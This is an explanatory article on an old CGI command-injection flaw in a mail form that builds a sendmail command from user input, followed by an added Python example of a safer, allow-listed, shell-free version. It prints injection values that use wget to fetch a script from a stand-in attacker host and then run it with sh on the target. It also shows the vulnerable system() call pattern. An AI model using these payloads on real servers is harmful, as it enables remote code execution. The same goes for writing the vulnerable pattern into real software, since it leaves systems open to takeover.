An ancient CGI vulnerability
Suppose that you have a CGI script that processes a form allowing users to send mail to other people by entering their e-mail addresses, and suppose that the script performs only minimal validation of those addresses: it requires that they be separated by spaces or commas and that each of them contains an @ sign.
Suppose that the CGI script in question implements the process of sending mail by calling
system("sendmail " + user_supplied_address_list)
from a scripting language like Perl or Python. (In practice it would probably be popen instead of system, but popen works much like system and has the same vulnerabilities.)
Here's a simple way of exploiting this script to gain access to the web server. On a web server you control, say www.example.com, create a file called att@ck in the root directory, containing a #!/bin/sh line followed by code you would like to run on the web server under attack. Then submit the CGI form with the recipient address list
you@example.com;wget -O/tmp/att@ck www.example.com/att@ck
and then submit it a second time with the recipient address list
you@example.com;sh /tmp/att@ck
This will result in the remote system executing the two commands
system("sendmail you@example.com;wget -O/tmp/att@ck www.example.com/att@ck")
and
system("sendmail you@example.com;sh /tmp/att@ck")
which will result in the code from http://www.example.com/att@ck being run with the web server's privileges on the system that hosts the CGI script. (Each of the tokens in the example above is a single string containing an @, so trivial e-mail address validation -- without removing the semicolon character -- won't fix this problem!)
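As an added example (not code from the original page), here is the weak check the text describes next to a hardened version in Python: recipients are allow-listed character by character and handed to sendmail as separate argv elements with no shell in between, so a semicolon can only ever be data. The address grammar and the bare "sendmail" command name are assumptions for illustration.

```python
import re
import subprocess

# The "minimal validation" from the text: split on spaces/commas and require
# an '@' in every token.  Both attack strings above pass this check.
def naive_accepts(address_list: str) -> bool:
    tokens = [t for t in re.split(r"[ ,]+", address_list) if t]
    return bool(tokens) and all("@" in t for t in tokens)

# Assumed allow-list: local part and dotted domain built only from characters
# with no meaning to a shell.  Deliberately narrower than RFC 5322.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

def parse_recipients(address_list: str) -> list[str]:
    tokens = [t for t in re.split(r"[ ,]+", address_list) if t]
    if not tokens:
        raise ValueError("no recipients")
    bad = [t for t in tokens if not ADDRESS_RE.fullmatch(t)]
    if bad:
        raise ValueError(f"rejected recipient(s): {bad}")
    return tokens

def rejects(address_list: str) -> bool:
    # Convenience wrapper so callers can check the outcome without try/except.
    try:
        parse_recipients(address_list)
    except ValueError:
        return True
    return False

def sendmail_argv(address_list: str) -> list[str]:
    # One argv element per recipient.  Because no shell parses this list,
    # ';', '|' or '$(...)' inside a token can never become command syntax;
    # the allow-list above rejects them before we get here anyway.
    return ["sendmail", *parse_recipients(address_list)]

def send(address_list: str, message: bytes) -> int:
    # A list argv runs with shell=False; never join it into one string.
    proc = subprocess.run(sendmail_argv(address_list), input=message, check=False)
    return proc.returncode
```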
This vulnerability is ancient and very widely discussed; the equivalent problem has plagued many people's software for years, even though mechanisms like these have been well documented and are the major inspiration for things like Perl's Taint Mode. Yet it still works against freshly-written scripts, and many sites are vulnerable. Being vulnerable to this feels kind of like coming down with some ancient and unfashionable disease like scurvy. That's so 18th-century!